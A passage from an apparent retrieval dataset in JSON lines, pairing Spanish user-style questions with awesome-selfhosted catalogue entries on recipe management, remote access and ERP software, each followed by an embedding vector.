0.02282, 0.03485, -0.02017, -0.06331, 0.07206, 0.01317, 0.06387, 0.0447, -0.05293, 0.06922, -0.08989, -0.01764, -0.12989, 0.0222, 0.02022, 0.06998, -0.01689, 0.01569, 0.02071, 0.04615, -0.04529, -0.00619, 0.07518, -0.01385, 0.07903, -0.03863, 0.04842, -0.04925, -0.0875, 0.06425, -0.01561, 0.04717, -0.02673, -0.06424, 0.05657, -0.04323, -0.02472, 0.00282, 0.00867, -0.10617, 0.08021, -0.08108, 0.10687, 0.01147, 0.01174, 0.02935, 0.04322, 0.0154, -0.05231, -0.06075, -0.00301, 0.03583, -0.02363, 0.03981, -0.0346, -0.02786, 0.01714, 0.05175, 0.01034, 0.04258, -0.00779, 0.00309, -0.01916, -0.03288, 0.01633, 0.00696, -0.01157, 0.02422, 0.05727, -0.01219, -0.03902, 0.021, -0.04249, 0.03046, -0.0052, 0.01984, 0.02911, 0.03283, -0.03069, -0.01785, 0.01609, -0.08727, -0.03209, -0.04057, -0.01574, -0.01559, -0.00585, 0.01613, -0.01171, -0.03248, 0.03274]} -{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Tamari β€” Recipe manager web app with a built-in collection of recipes. Organize by favorites and categories, create shopping lists, and plan meals [GPL-3.0, Docker/Python]. Vanilla Cookbook β€” Recipe manager designed with complexity under the hood, keeping the user experience as uncluttered, simply vanilla as possible [GPL-3.0, Docker/Nodejs]. What To Cook? β€” Get a recipe to cook today, based on the ingredients you have at home [AGPL-3.0, Docker].", "indexar": "con que puedo montar una app web sencilla para planear mis comidas?", "v": [0.17443, 0.08645, -0.14839, -0.05785, -0.10771, 0.05107, -0.07052, 0.02515, -0.27463, -0.11466, 0.00467, 0.02981, 0.07024, -0.06942, 0.0321, 0.00453, 0.05746, -0.02764, 0.1043, 0.03129, -0.00679, -0.02654, -0.13111, -0.07307, -0.12262, 0.06123, 0.1666, 0.06522, -0.24092, 0.03401, -0.07493, 0.07441, 0.07232, 0.02555, -0.12761, -0.03752, -0.02262, 0.06562, -0.0935, -0.12413, -0.04741, 0.00121, 0.002, 0.03499, -0.13265, 0.0566, 0.05444, -0.09298, -0.05043, 0.0941, 0.06516, -0.03319, -0.00227, 0.10987, -0.07323, 0.02044, 0.14962, -0.13561, 0.07865, 0.04079, -0.02093, 0.08688, 0.05452, 0.09294, 0.06455, 0.08369, 0.01197, 0.13441, -0.0274, -0.03125, -0.01336, 0.02252, 0.0803, -0.00539, 0.03867, 0.01479, 0.01835, 0.04231, 0.0593, 0.01491, 0.0235, -0.12719, -0.03056, 0.07748, -0.03234, -0.06018, 0.00418, -0.08764, 0.00909, 0.04176, 0.08311, 0.04017, 0.06173, 0.01218, -0.00329, -0.11925, 0.07828, 0.08934, -0.04449, 0.08971, -0.03119, -0.0517, -0.11138, 0.05849, -0.06727, 0.00331, 0.09773, -0.00828, -0.05219, -0.06857, 0.01637, -0.09125, -0.10152, -0.02843, -0.09311, -0.02248, -0.09624, 0.04361, -0.04474, -0.06938, -0.03289, 0.02228, -0.00588, 0.08802, 0.01031, 0.03383, 0.01288, 0.10357, -0.00652, 0.02278, -0.01693, -0.00046, -0.01551, -0.00427, 0.00778, -0.00875, 0.01866, -0.00497, 0.02005, 0.00948, 0.0228, 0.00827, -0.08617, -0.01652, -0.00517, 0.01576, -0.00523, -0.05117, -0.05797, 0.04711, -0.01674, 0.09402, -0.00279, 0.02485, -0.09718, 0.03693, -0.0487, -0.07275, 0.0141, 0.10521, -0.01918, 0.04116, -0.04388, 0.00428, -0.02524, -0.05619, -0.03478, 0.02786, 0.09412, 0.03505, -0.01692, 0.068, 0.04945, -0.02177, 0.06458, -0.03157, -0.05118, -0.02523, -0.0328, -0.0294, -0.11531, -0.00335, 0.0483, 0.06619, -0.00992, -0.04347, 0.01792, 0.00841, 0.0041, 0.03247, 0.02096, 0.0374, -0.02259, -0.02294, -0.00097, 0.03442, -0.06753, 0.00234, 0.03169, -0.04133, -0.00826, -0.08093, -0.00097, -0.00944, -0.00722, 0.0311, 0.00761, 0.04947, -0.01333, 0.06734, 0.01312, -0.02221, 0.07989, -0.06836, -0.00706, -0.00779, 0.09646, 0.00046, -0.07758, 0.05774, -0.03355, 0.04004, 0.05793, 0.01296, 0.08915, 0.01299, 0.03795, 0.0162, 0.00258, 0.00696, 0.04298, -0.03301, -0.01078, -0.03268, -0.00267, -0.00548, 0.02962, 0.0057, -0.08469, 0.02978, -0.01279, 0.03717, 0.03835, -0.02794, -0.02193, -0.05869, -0.01849, 0.01151, -0.00081, -0.04232, 0.01709, 0.02762, 0.04224, 0.00676, 0.03496, -0.0318]} -{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Cardea β€” SSH bastion server with access control, session recording, and optional TPM-backed key protection [EUPL-1.2, Go/Docker]. Engity's BifrΓΆst β€” Highly customizable SSH server with several ways to authorize a user and options where and how to execute a user's session [Apache-2.0, Go/Docker]. Firezone β€” Secure remote access gateway that supports the WireGuard protocol. It offers a Web GUI, 1-line install script, multi-factor auth (MFA), and SSO [Apache-2.0, Elixir/Docker]. Guacamole β€” Clientless remote desktop gateway supporting standard protocols like VNC and RDP [Apache-2.0, Java/C]. MeshCentral β€” Run your own web server to remotely manage and control computers on a local network or anywhere on the internet [Apache-2.0, Nodejs]. ShellHub β€” Modern SSH server for remotely accessing linux devices via command line (using any SSH client) or web-based user interface (alternative to sshd) [Apache-2.0, Docker]. Sshwifty β€” Sshwifty is a SSH and Telnet connector made for the Web [AGPL-3.0, Go/Docker].", "indexar": "que herramienta sirve para acceder remotamente a servidores linux de forma segura?", "v": [0.02266, -0.06259, -0.215, -0.21413, 0.10415, -0.16389, -0.1386, -0.08367, -0.0615, -0.02449, -0.08564, -0.07573, 0.1598, -0.09431, 0.11688, 0.01137, 0.04644, -0.08652, -0.01839, 0.01714, 0.06918, 0.05665, -0.02348, -0.02829, -0.08185, -0.00472, 0.13271, -0.10518, -0.04244, 0.01976, 0.03881, -0.01315, 0.04, -0.00837, -0.08817, 0.01035, -0.07042, 0.10797, 0.01826, 0.10431, 0.08882, 0.03531, -0.05496, -0.02208, -0.02529, -0.02284, 0.02829, -0.01929, 0.10762, 0.00182, -0.09581, -0.14131, -0.10774, -0.09848, -0.05663, -0.02802, 0.18594, -0.13813, 0.04276, -0.04939, -0.19406, -0.01821, -0.06859, -0.04408, 0.03506, -0.04662, -0.00794, -0.08795, -0.11775, -0.00129, -0.07335, 0.0125, 0.00774, -0.04247, -0.06208, -0.01648, -0.10648, 0.03476, 0.11081, 0.04911, 0.01104, 0.03893, -0.04817, -0.01015, -0.15301, -0.17779, 0.05452, 0.02007, -0.01704, -0.01425, 0.02895, 0.08387, -0.01356, 0.11959, 0.02154, 0.01547, 0.07232, -0.05352, -0.02729, -0.08584, 0.08502, 0.01097, -0.03426, 0.07271, -0.06592, 0.01595, 0.05436, -0.04154, 0.01807, -0.08261, 0.08771, -0.01114, -0.02697, 0.0198, -0.05152, 0.00265, -0.05737, -0.03976, 0.01764, 0.01034, -0.01198, 0.00328, -0.02374, -0.00227, 0.05485, -0.03395, -0.00051, 0.06408, -0.00393, -0.12749, 0.01676, -0.06708, -0.09151, 0.05479, -0.03408, -0.03619, 0.05106, -0.14309, -0.04032, -0.06745, 0.0397, 0.06113, -0.02331, -0.05699, 0.07653, -0.01743, 0.098, -0.02858, -0.02485, -0.02696, -0.00761, -0.01862, -0.02433, -0.00303, -0.11018, -0.01556, -0.04864, -0.03635, -0.11667, 0.04049, -0.00075, -0.02739, 0.06145, 0.03816, -0.01314, -0.01324, 0.0133, 0.01463, 0.07333, 0.05712, -0.02998, 0.04162, 0.06393, -0.07368, -0.0276, -0.0828, -0.05756, -0.04577, 0.0153, -0.02599, -0.02423, 0.01284, -0.04842, -0.04868, 0.00512, -0.04052, 0.00553, -0.01597, -0.01176, 0.02787, 0.03203, 0.00686, -0.03919, -0.01625, 0.01534, -0.00549, -0.06919, -0.02619, 0.01263, 0.0033, -0.03014, -0.04375, -0.00989, -0.02289, 0.06299, 0.01997, -0.0301, 0.02023, -0.02457, 0.06038, 0.03807, -0.00408, 0.0688, -0.01519, 0.02093, -0.04194, 0.0572, -0.01924, -0.0002, 0.00313, -0.00863, -0.02519, 0.04246, 0.0136, -0.0075, 0.0335, 0.02209, 0.01509, 0.00715, -0.07286, 0.03663, 0.00859, -0.00701, 0.00536, 0.00313, -0.05976, 0.04189, -0.03748, -0.03023, -0.06225, -0.01751, 0.0968, -0.02183, -0.05175, -0.06275, -0.10009, -0.04488, -0.02131, -0.05008, -0.05999, -0.03879, -0.03157, 0.04971, 0.00025, -0.01477, -0.02537]} -{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Cardea β€” SSH bastion server with access control, session recording, and optional TPM-backed key protection [EUPL-1.2, Go/Docker]. Engity's BifrΓΆst β€” Highly customizable SSH server with several ways to authorize a user and options where and how to execute a user's session [Apache-2.0, Go/Docker]. Firezone β€” Secure remote access gateway that supports the WireGuard protocol. It offers a Web GUI, 1-line install script, multi-factor auth (MFA), and SSO [Apache-2.0, Elixir/Docker]. Guacamole β€” Clientless remote desktop gateway supporting standard protocols like VNC and RDP [Apache-2.0, Java/C]. MeshCentral β€” Run your own web server to remotely manage and control computers on a local network or anywhere on the internet [Apache-2.0, Nodejs]. ShellHub β€” Modern SSH server for remotely accessing linux devices via command line (using any SSH client) or web-based user interface (alternative to sshd) [Apache-2.0, Docker]. Sshwifty β€” Sshwifty is a SSH and Telnet connector made for the Web [AGPL-3.0, Go/Docker].", "indexar": "cual programa puedo usar para gestionar equipos remotos sin tener que conectar por SSH manualmente?", "v": [0.11424, 0.09667, -0.19443, -0.14831, 0.07729, -0.07643, 0.0007, -0.07552, -0.09068, -0.03568, -0.20089, -0.04886, 0.06517, -0.0573, 0.07135, 0.06167, 0.04793, -0.05935, -0.04842, 0.02887, 0.05131, -0.04401, 0.03217, -0.00717, -0.02924, 0.03734, 0.16669, -0.03733, -0.11836, -0.04229, 0.04628, 0.01798, 0.10214, -0.03189, 0.02067, -0.04465, -0.05923, 0.11379, 0.03163, 0.05165, 0.00976, 0.0286, -0.14683, -0.00796, 0.1492, 0.0056, 0.09248, -0.03188, -0.00293, -0.01399, -0.09318, 0.05497, -0.08198, -0.09188, -0.0343, -0.08333, 0.21127, -0.13675, 0.00466, -0.03279, -0.00881, 0.04243, 0.0004, 0.06363, 0.04649, -0.06087, -0.01743, -0.07784, -0.17317, 0.04988, -0.03119, 0.02836, 0.00987, 0.00627, 0.01432, 0.09025, 0.00986, 0.02122, 0.11093, -0.07216, -0.05447, -0.06839, -0.00014, 0.0156, -0.12852, -0.12725, 0.0754, 0.01494, -0.01255, -0.11477, 0.03155, -0.09022, -0.02952, -0.08168, 0.07336, -0.03291, 0.07482, 0.03736, 0.00174, 0.03617, 0.03937, 0.04121, -0.01367, 0.15833, -0.0244, 0.01811, 0.11233, -0.02036, 0.0015, 0.0003, -0.02724, -0.02741, -0.04791, -0.03123, -0.0578, -0.00652, -0.06323, -0.07919, 0.01282, -0.00243, -0.12687, -0.06872, 0.02222, -0.02134, 0.09013, -0.03056, -0.00062, 0.12348, -0.00285, 0.09129, -0.00538, -0.00641, 0.00014, -0.06378, -0.06595, -0.0032, -0.05122, -0.03876, -0.01285, -0.11138, -0.01133, 0.07859, 0.01248, -0.03549, 0.09308, -0.01759, -0.02856, -0.0895, 0.01054, 0.06598, 0.05272, -0.00456, -0.04002, 0.08958, -0.02125, 0.03968, 0.00709, -0.06224, -0.08095, 0.07651, -0.07053, -0.01862, 0.02925, -0.01321, 0.06441, -0.0668, -0.02086, -0.01586, 0.08849, 0.05465, -0.07759, 0.07102, -0.00983, -0.00591, -0.01074, -0.04871, 0.00927, -0.05343, 0.05276, -0.02459, -0.0761, 0.03234, 0.00962, -0.04437, 0.01106, 0.06044, -0.02606, 0.03877, 0.00457, 0.03258, 0.00266, 0.04918, -0.02881, -0.00237, 0.03805, -0.02784, -0.03415, -0.03923, 0.00783, 0.00029, -0.05743, 0.02954, 0.01705, -0.00764, 0.09663, 0.05299, -0.0768, 0.05342, 0.05153, 0.0964, 0.05303, -0.07739, 0.08817, -0.03177, -0.05691, -0.01886, -0.02609, -0.05652, 0.02628, 0.04776, 0.01131, -0.01729, 0.07884, 0.00608, 0.00864, 0.00839, 0.04917, 0.07038, 0.03838, -0.01014, -0.05694, 0.02249, 0.01916, -0.02301, 0.04162, 0.01226, 0.02605, -0.07518, -0.02667, 0.00693, 0.00094, 0.09195, -0.00518, -0.0445, -0.04549, -0.0366, -0.1348, 0.04651, -0.00824, -0.0369, -0.00697, 0.05797, 0.04037, -0.01733, 0.0344, 0.00146]} -{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Cardea β€” SSH bastion server with access control, session recording, and optional TPM-backed key protection [EUPL-1.2, Go/Docker]. Engity's BifrΓΆst β€” Highly customizable SSH server with several ways to authorize a user and options where and how to execute a user's session [Apache-2.0, Go/Docker]. Firezone β€” Secure remote access gateway that supports the WireGuard protocol. It offers a Web GUI, 1-line install script, multi-factor auth (MFA), and SSO [Apache-2.0, Elixir/Docker]. Guacamole β€” Clientless remote desktop gateway supporting standard protocols like VNC and RDP [Apache-2.0, Java/C]. MeshCentral β€” Run your own web server to remotely manage and control computers on a local network or anywhere on the internet [Apache-2.0, Nodejs]. ShellHub β€” Modern SSH server for remotely accessing linux devices via command line (using any SSH client) or web-based user interface (alternative to sshd) [Apache-2.0, Docker]. Sshwifty β€” Sshwifty is a SSH and Telnet connector made for the Web [AGPL-3.0, Go/Docker].", "indexar": "con que puedo montar un portal web para administrar mis dispositivos desde cualquier lugar?", "v": [0.06249, 0.17591, -0.14739, -0.17683, -0.07531, 0.05853, 0.03105, 0.00699, -0.21614, -0.07776, -0.04438, -0.08352, 0.08382, -0.0295, 0.08606, 0.05139, 0.10591, -0.12842, 0.04237, 0.0059, -0.01164, 0.01292, 0.00481, 0.01639, -0.06298, -0.02264, 0.09477, -0.09204, -0.21611, -0.02588, 0.01996, 0.08142, 0.03882, 0.05735, -0.03436, -0.10343, 0.05013, 0.10507, -0.03949, -0.04196, -0.08802, -0.00231, -0.03744, 0.07313, -0.02037, 0.00203, 0.02353, -0.17517, 0.01648, 0.01692, -0.01401, -0.04606, -0.11537, 0.02378, -0.05443, -0.04199, 0.20104, -0.13388, 0.14487, -0.07602, -0.10655, 0.06384, -0.09157, 0.15654, 0.00536, 0.05723, -0.03056, 0.03967, -0.13045, -0.00307, 0.02567, -0.07023, -0.00175, -0.00673, 0.03956, 0.09686, -0.05884, 0.0216, 0.09505, 0.01872, 0.01883, -0.01713, -0.02789, 0.06297, -0.10658, -0.06226, -0.01503, -0.07363, -0.0147, -0.05391, 0.07685, -0.01231, 0.03998, -0.03334, -0.08733, -0.13371, 0.05821, 0.08337, 0.01127, -0.005, -0.03317, 0.02659, -0.05873, 0.12075, -0.0121, 0.00259, 0.06361, -0.04732, 0.04502, -0.1086, 0.04722, -0.04874, -0.08534, -0.01533, -0.07541, 0.03837, -0.03452, 0.02604, 0.00788, -0.01815, -0.05684, -0.04657, 0.08741, -0.01557, 0.08821, 0.04886, 0.06419, 0.03467, 0.02303, -0.00734, 0.06109, -0.06016, 0.00089, -0.01081, 0.03047, 0.05368, -0.02994, -0.03312, 0.02356, 0.01346, 0.04231, -0.01943, -0.06813, -0.02785, 0.07036, -0.05565, -0.01776, -0.02747, -0.03564, 0.00994, 0.0072, 0.08765, -0.01769, 0.03769, -0.08964, 0.0576, -0.00671, -0.04371, -0.02998, 0.06269, -0.03445, 0.0353, 0.01897, 0.05204, -0.0572, 0.01399, -0.09196, 0.04064, 0.09119, 0.00739, -0.07276, 0.14033, 0.04088, -0.04257, 0.10066, 0.00442, -0.03847, -0.01969, 0.08084, -0.04116, -0.04417, 0.01706, -0.03489, 0.07398, -0.06012, 0.00117, 0.03594, 0.02017, -0.0381, 0.06366, 0.00138, 0.0207, 0.00907, 0.04219, 0.07256, -0.07078, -0.06312, -0.0051, 0.00357, 0.00742, -0.03829, -0.02999, -0.01554, -0.04214, -0.01932, -0.01062, 0.0053, 0.01226, 0.03387, 0.04255, 0.01817, -0.0244, 0.0154, -0.06143, -0.04978, -0.03178, 0.05503, 0.00176, -0.0742, -0.01474, 0.03489, 0.00164, 0.02658, -0.01435, 0.04104, 0.06807, -0.00115, 0.03688, 0.01129, -0.02559, -0.01264, -0.02774, -0.01736, -0.03526, 0.0041, -0.01887, 0.03999, -0.04366, -0.07148, 0.00816, -0.05441, 0.04908, 0.02502, -0.00028, -0.0348, -0.05905, -0.09916, 0.0614, -0.06733, -0.08094, -0.02987, 0.04339, 0.06278, -0.01489, -0.03757, 0.01184]} -{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Termix β€” Clientless web-based server management platform with SSH terminal, tunneling, and file editing capabilities [Apache-2.0, Docker]. Warpgate β€” Fully transparent SSH, HTTPS, Kubernetes, MySQL and Postgres bastion/PAM that doesn't need additional client-side software [Apache-2.0, Rust/Docker].", "indexar": "que plataforma web me permite administrar servidores por SSH sin instalar clientes extra?", "v": [0.06675, 0.04822, -0.20259, -0.22578, 0.03129, -0.13875, 0.00607, -0.28891, -0.12745, 0.01641, -0.18258, -0.03064, 0.09711, -0.17683, 0.07808, 0.02604, 0.06452, -0.11805, 0.0588, 0.11555, 0.06892, 0.02704, -0.05295, -0.04812, -0.08144, -0.00249, 0.05658, -0.07828, -0.11814, 0.00399, -0.00226, -0.0401, -0.01208, 0.05203, 0.04872, -0.06776, -0.08368, 0.11393, 0.03289, 0.04586, 0.07749, 0.01795, -0.02161, -0.01207, 0.07582, 0.00914, 0.04242, -0.12616, 0.11863, 0.04151, -0.09732, -0.00474, -0.17706, -0.0003, -0.01771, -0.01466, 0.11949, -0.12595, 0.05811, 0.03276, -0.11306, 0.10628, -0.00043, 0.11154, 0.04672, 0.02675, 0.02541, 0.04043, -0.09174, 0.0698, -0.01888, 0.03997, 0.04249, -0.09145, 0.00124, 0.08676, -0.00165, -0.00758, 0.02867, -0.00188, 0.04727, -0.00226, -0.06789, 0.05633, -0.09635, -0.0867, -0.03267, -0.04876, 0.02667, -0.01578, 0.05523, -0.01764, 0.01215, -0.0031, -0.01559, -0.09043, 0.1111, -0.07972, -0.00883, -0.02072, -0.00373, 0.06601, 0.0161, 0.0568, -0.04817, 0.01123, 0.04705, -0.1054, 0.01289, -0.07548, 0.07689, -0.02184, -0.00656, 0.013, -0.01606, -0.0096, 0.00701, 0.00083, -0.03372, 0.05008, -0.04516, -0.03611, 0.0646, 0.00076, 0.05556, -0.05647, 0.01823, 0.03992, -0.01841, -0.03246, 0.01274, -0.0992, -0.00621, 0.03299, -0.02321, 0.01321, 0.04313, 0.02349, -0.00892, -0.05911, -0.04176, -0.02028, -0.01561, -0.02926, 0.09842, -0.05163, 0.03554, -0.06117, -0.05181, 0.02401, -0.0256, 0.00212, -0.0824, 0.04357, -0.10395, -0.01735, 0.05327, -0.06597, -0.10378, 0.05597, 0.0389, -0.01071, 0.04811, 0.11206, -0.0057, 0.00442, -0.11548, 0.05108, 0.05713, 0.04602, 0.02342, 0.06943, 0.03295, -0.08731, 0.03399, -0.0073, -0.10107, -0.02413, 0.09807, 0.03438, -0.05425, -0.00537, 0.03131, 0.05214, -0.09205, -0.0401, -0.02251, -0.01627, -0.04769, 0.02942, 0.05911, 0.05125, -0.07159, 0.02399, 0.05363, -0.02449, -0.04479, -0.03172, -0.00391, -0.01352, -0.03849, 0.01083, -0.05813, -0.06228, 0.01756, 0.01259, -0.0255, 0.05662, 0.00545, 0.02612, 0.00532, -0.01558, 0.06371, -0.06862, 0.01972, -0.0283, 0.06464, -0.07375, 0.01882, -0.04241, -0.04309, 0.00576, -0.01338, 0.00549, -0.01162, 0.03757, 0.00161, 0.03769, 0.02718, -0.00849, -0.01806, -0.02264, 0.01534, -0.03064, -0.00983, -0.07705, 0.03013, -0.02651, -0.06047, -0.01051, -0.03174, 0.04959, 0.01354, -0.00636, -0.00287, -0.08442, -0.02226, -0.00068, -0.04447, -0.02865, -0.02314, 0.00907, 0.04377, -0.01658, -0.01382, 0.04776]} -{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Termix β€” Clientless web-based server management platform with SSH terminal, tunneling, and file editing capabilities [Apache-2.0, Docker]. Warpgate β€” Fully transparent SSH, HTTPS, Kubernetes, MySQL and Postgres bastion/PAM that doesn't need additional client-side software [Apache-2.0, Rust/Docker].", "indexar": "existe alguna alternativa libre a Termix para gestionar servidores desde el navegador?", "v": [-0.17282, 0.04864, -0.1763, -0.21106, -0.09023, 0.00995, -0.03644, -0.04694, -0.08891, -0.10601, -0.03509, -0.12745, 0.09965, -0.0112, 0.17439, 0.05567, 0.15168, -0.10225, 0.136, 0.05615, 0.01136, 0.07847, 0.03223, -0.03945, -0.01768, -0.06605, -0.07987, -0.16852, -0.05183, -0.02616, -0.03895, -0.11572, 0.03378, -0.02787, -0.00574, 0.06482, 0.07709, 0.08723, 0.04055, -0.07232, 0.04046, -0.01869, -0.06407, 0.06613, -0.03187, -0.00991, -0.05129, -0.06705, 0.03891, -0.04049, -0.07767, -0.07134, -0.12229, 0.03818, -0.03011, 0.04462, 0.1092, -0.15206, -0.0275, -0.05597, -0.07191, 0.08553, -0.05324, -0.00573, 0.04591, 0.02383, -0.0056, -0.03808, -0.06617, 0.08827, 0.0161, 0.02383, -0.04247, -0.03825, -0.05719, 0.04806, 0.01969, 0.02234, 0.02315, 0.12697, 0.09329, 0.00435, -0.04662, -0.01346, -0.107, -0.13496, 0.01493, -0.10948, -0.0002, 0.03567, 0.07374, 0.07911, -0.03486, 0.02682, -0.01351, -0.08381, 0.09396, -0.02486, -0.01919, 0.03488, 0.07058, 0.10855, -0.09238, 0.03834, -0.00542, 0.03028, 0.09224, -0.06194, 0.00533, 0.0255, -0.00106, -0.00713, -0.03974, -0.0232, 0.01435, -0.01138, -0.02693, -0.0157, -0.01876, 0.02883, -0.10335, -0.03857, -0.01879, 0.01365, 0.03619, 0.00631, 0.0924, 0.01695, -0.0006, -0.04441, 0.01778, -0.08294, -0.05378, -0.02956, -0.09705, 0.00075, 0.05073, 0.01915, 0.00283, -0.05106, -0.04059, 0.02967, -0.03878, 0.03622, 0.05511, -0.07432, 0.04099, -0.02635, 0.00458, -0.07513, -0.03234, -0.13919, -0.03845, 0.05987, -0.0716, 0.08037, -0.0712, -0.03087, -0.11027, 0.05138, 0.00211, -0.03485, -0.01974, 0.13554, -0.00088, 0.01222, -0.02058, 0.04965, -0.0163, 0.06052, -0.01239, 0.0445, 0.13759, -0.10075, 0.02325, -0.06477, -0.07463, -0.09988, 0.07231, 0.03041, 0.1055, -0.0214, -0.07908, 0.01465, -0.08025, -0.04196, -0.02521, 0.07527, -0.08417, -0.01831, 0.0066, -0.01179, -0.07094, -0.04925, 0.13306, 0.01589, 0.00625, -0.08001, -0.03247, -0.00746, -0.03142, -0.04743, 0.02455, -0.03703, -0.05996, -0.00358, -0.01925, 0.01049, 0.05901, 0.05125, -0.00772, 0.01489, 0.04474, 0.01424, 0.00407, 0.00744, 0.08082, -0.03907, -0.0293, -0.05152, -0.04615, -0.01244, 0.0076, 0.02579, 0.02297, 0.06586, 0.03387, 0.01221, -0.02626, 0.01653, 0.02644, 0.02572, 0.01427, 0.06865, -0.04567, -0.05907, 0.05076, -0.0007, 0.00536, 0.00369, -0.00318, 0.09084, 0.00783, -0.01921, -0.03896, -0.03642, -0.07691, -0.03243, -0.05738, -0.002, 0.01507, 0.01385, -0.02784, 0.03597, -0.04353, 0.03993]} -{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Termix β€” Clientless web-based server management platform with SSH terminal, tunneling, and file editing capabilities [Apache-2.0, Docker]. Warpgate β€” Fully transparent SSH, HTTPS, Kubernetes, MySQL and Postgres bastion/PAM that doesn't need additional client-side software [Apache-2.0, Rust/Docker].", "indexar": "con quΓ© puedo acceder a mi servidor de forma segura sin necesidad de programas instalados en mi ordenador?", "v": [0.02116, 0.12469, -0.21145, -0.14969, 0.02095, -0.12302, -0.06359, -0.07292, -0.11734, -0.06438, -0.05547, 0.03391, 0.03416, -0.11126, 0.06507, -0.03277, 0.14198, -0.08615, 0.04249, 0.11121, 0.07688, 0.00195, 0.00703, -0.01149, -0.04639, 0.0633, 0.01519, 0.02336, -0.05709, -0.06201, 0.01349, 0.04026, 0.03405, -0.0604, -0.04261, -0.06658, -0.06378, 0.07218, 0.00648, 0.0092, 0.0723, 0.02467, 0.03243, 0.05617, 0.11691, -0.00201, 0.0834, -0.09262, 0.08625, -0.0667, -0.08909, -0.10827, -0.10472, -0.09919, -0.02424, -0.07759, 0.11086, -0.10669, 0.14641, -0.012, -0.1885, 0.10222, 0.00353, 0.04406, 0.0994, 0.03019, 0.02436, 0.00099, -0.09106, -0.01415, -0.11326, -0.03632, -0.05407, -0.09902, -0.00359, 0.00291, -0.03309, -0.07899, 0.15854, 0.09288, 0.01788, 0.05312, -0.00395, 0.04055, -0.09423, -0.09503, 0.00814, -0.03805, 0.03365, -0.02249, 0.07401, 0.07114, -0.06239, 0.12824, 0.03575, -0.04302, 0.09464, 0.06362, -0.0383, 0.05288, 0.06108, 0.00547, -0.06318, 0.15968, -0.08435, 0.02104, 0.09128, -0.07886, 0.05191, -0.05424, 0.079, 0.02006, -0.05484, -0.06074, -0.07816, 0.01261, -0.02154, -0.02943, -0.02794, -0.01704, -0.06751, -0.00651, 0.01243, 0.01885, 0.04333, -0.04232, 0.03087, 0.098, -0.07955, -0.04533, 0.0241, -0.05514, -0.04169, -0.03815, -0.0189, -0.0007, -0.00501, -0.1252, -0.01718, -0.06312, 0.01283, 0.07286, -0.02806, -0.01104, 0.04139, 0.03627, 0.04889, -0.0357, -0.08595, -0.04462, 0.01981, 0.02142, -0.00745, 0.03725, -0.07928, 0.04812, 0.04454, -0.03095, -0.02643, 0.05907, -0.00591, 0.06877, 0.04627, 0.03437, 0.0257, -0.00382, -0.01802, 0.0168, 0.07216, 0.10018, -0.10138, 0.05637, -0.00328, -0.08257, -0.00266, -0.02294, -0.0652, -0.04143, -0.00073, 0.00388, -0.07575, 0.06559, -0.01202, 0.02943, -0.08495, -0.05449, -0.02962, 0.02161, -0.0087, -0.00527, 0.01659, 0.02096, -0.04827, -0.00355, 0.02697, -0.06506, -0.06747, -0.01127, 0.02277, -0.03254, -0.07517, -0.03702, -0.06502, -0.03931, 0.0693, 0.07203, -0.04848, 0.02736, -0.00353, 0.07852, 0.0191, -0.0419, 0.07906, -0.0152, -0.01678, -0.05779, 0.09133, -0.00305, 0.04571, 0.00633, 0.02448, -0.03489, 0.03997, -0.00048, -0.00287, -0.08258, 0.01416, 0.01695, 0.04746, -0.01103, -0.03761, 0.00354, -0.04449, -0.02089, 0.02806, -0.01811, -0.00898, -0.08181, -0.05858, -0.04245, 0.01236, 0.12851, 0.02186, -0.1118, -0.0264, -0.05418, -0.10835, -0.00306, -0.06618, -0.05281, -0.05082, -0.01856, 0.02997, -0.04618, 0.01912, 0.01821]} -{"tipo": "pregunta", "herramienta": "Resource Planning", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Resource Planning", "tema": "resource planning", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Resource Planning: Dolibarr β€” Modern CRM software package to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, accounting, ...) [GPL-3.0, PHP/deb]. ERPNext β€” ERP system to help you run your business [GPL-3.0, Python/Docker]. farmOS β€” Web-based farm record keeping application [GPL-2.0, PHP/Docker]. grocy β€” ERP beyond your fridge. Groceries & household management solution for your home [MIT, PHP/Docker]. LedgerSMB β€” Integrated accounting and ERP system for small and midsize businesses, with double entry accounting, budgeting, invoicing, quotations, projects, orders and inventory management, shipping and more [GPL-2.0, Docker/Perl]. Odoo β€” Free open source ERP system [LGPL-3.0, Python/deb/Docker]. OFBiz β€” Enterprise Resource Planning system with a suite of business applications flexible enough to be used across any industry [Apache-2.0, Java]. Tryton β€” Free open source business solution [GPL-3.0, Python].", "indexar": "quΓ© programa gratuito sirve para gestionar una empresa o fundaciΓ³n con facturas y pedidos", "v": 